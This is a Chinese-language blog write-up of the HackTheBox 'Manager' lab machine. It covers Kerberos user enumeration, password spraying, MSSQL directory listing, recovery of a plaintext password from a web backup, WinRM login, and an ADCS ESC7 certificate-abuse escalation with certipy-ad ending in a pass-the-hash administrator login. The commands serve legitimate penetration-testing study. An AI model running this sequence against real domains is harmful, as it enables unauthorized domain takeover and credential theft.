[渗透测试学习] Manager - HackTheBox
文章目录
信息搜集
nmap扫描一下端口
nmap -sV -sC -p- -v --min-rate 1000 10.10.11.236
![[渗透测试学习] Manager - HackTheBox_第1张图片](http://img.e-com-net.com/image/info8/9d7193ec918b446c8a91997f79929f04.jpg)
扫出来很多端口,其中80端口有http服务,88端口是采用一个身份验证协议kerberos,以及NetBIOS-SSN(端口139)和Microsoft-DS(端口445)都与SMB有关
1433端口有msssql服务,存在域名manager.htb
我们可以把该域名添加到/etc/hosts
![[渗透测试学习] Manager - HackTheBox_第2张图片](http://img.e-com-net.com/image/info8/ca9f7be16a6b4605bd34147aade3955d.jpg)
尝试访问一下80端口没啥收获
![[渗透测试学习] Manager - HackTheBox_第3张图片](http://img.e-com-net.com/image/info8/d04d9dda44c0438793e41540b46a06a7.jpg)
再来看看88端口,利用工具kerbrute以及seclist字典
看一下使用参数
./kerbrute_linux_amd64 -h
![[渗透测试学习] Manager - HackTheBox_第4张图片](http://img.e-com-net.com/image/info8/e16108bdbc0e41a7869f962f0babcd66.jpg)
字典使用下图最后一个无重复用户名的
使用-d参数指定域名和–dc参数指定url
./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236
![[渗透测试学习] Manager - HackTheBox_第5张图片](http://img.e-com-net.com/image/info8/adbb490050d34505b80ea635992e4e11.jpg)
扫出来用户名,再试试工具crackmapexec去密码喷洒(我们知道有端口使用smb协议)
user.txt(注意是小写)
ryan
cheng
raven
operator
jinwoo
zhong
chinhaw
发现用户“operator”可以访问SMB(工具会报错奇奇怪怪…)
然后连接mssql数据库
impacket-mssqlclient manager.htb/operator:[email protected] -windows-auth
当前用户为guests
![[渗透测试学习] Manager - HackTheBox_第6张图片](http://img.e-com-net.com/image/info8/45d7d1965bd94e35a1cecc82035fd6b9.jpg)
我们用拓展xp_dirtree去列出文件
exec xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
注:inetpub通常用于存放 Internet Information Services (IIS) 的网站文件和相关内容。IIS是一种用于托管和管理网站的Web服务器软件。
![[渗透测试学习] Manager - HackTheBox_第7张图片](http://img.e-com-net.com/image/info8/37f678a54ea84e708d52f9260498abc7.jpg)
发现有zip文件,我们在本地wget下载下来
wget 10.10.11.236/website-backup-27-07-23-old.zip
访问一下,在.old-conf.xml文件找到和raven相关的信息
![[渗透测试学习] Manager - HackTheBox_第8张图片](http://img.e-com-net.com/image/info8/c1f3c5f3a0a947bc8dcbc3c40b170cad.jpg)
既然我们得到密码,那么我们直接用evil-winrm去进行远程登录
evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
得到user的flag
![[渗透测试学习] Manager - HackTheBox_第9张图片](http://img.e-com-net.com/image/info8/b92c67941cde41ccb3686dbb78880075.jpg)
我们上传一个Certify.exe,查找/vulnerable(易受攻击)的内容或文件
Certify.exe是一个可执行文件,它是Certify SSL/TLS(Transport Layer Security)证书管理工具的一部分
![[渗透测试学习] Manager - HackTheBox_第10张图片](http://img.e-com-net.com/image/info8/9dc36c1f1de8488ca0b63ae63594cd56.jpg)
在这里注意到用户 raven 已允许管理 CA(证书)。它表明必须正在运行 ADCS(Active Directory 证书服务)并且它容易受到 ESC7 漏洞的影响。(参考文章)
按照参考文章的步骤
如果您只有“管理 CA”访问权限,则可以通过将您的用户添加为新官员来授予自己“管理证书”访问权限。
sudo certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
可以使用 -enable-template 参数在 CA 上启用 SubCA 模板。默认情况下,SubCA 模板处于启用状态。
sudo certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
Attack
如果我们已经满足了此攻击的先决条件,我们可以首先请求基于 SubCA 模板的证书。 该请求将被拒绝,但我们将保存私钥并记下请求 ID。
sudo certipy-ad req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn [email protected]
![[渗透测试学习] Manager - HackTheBox_第11张图片](http://img.e-com-net.com/image/info8/c8362d46a4474217b274c30820588bd1.jpg)
通过管理 CA 和管理证书,我们可以使用 ca 命令和 -issue-request 参数发出失败的证书请求。
sudo certipy-ad ca -ca "manager-DC01-CA" -issue-request 19 -username '[email protected]' -password 'R4v3nBe5tD3veloP3r!123'
最后,我们可以使用 req 命令和 -retrieve 参数检索颁发的证书。
sudo certipy-ad req -username '[email protected]' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 19
注意:服务器会在一分钟内自动重置其设置,因此准备好所有命令以便快速执行非常重要。您可以准备一个脚本或一组命令,并根据需要快速复制和粘贴。
然后就是成功验证管理员身份了
sudo certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236 -username administrator -domain 'manager.htb'
但是会出现报错,重要的是通过与Kerberos同步时间来解决这些错误。这可以通过执行以下命令来完成
sudo ntpdate -u manager.htb
然后得到hash值,再用evil-winrm登录即可得到root的flag
evil-winrm -i 10.10.11.236 -u administrator -H ae*******************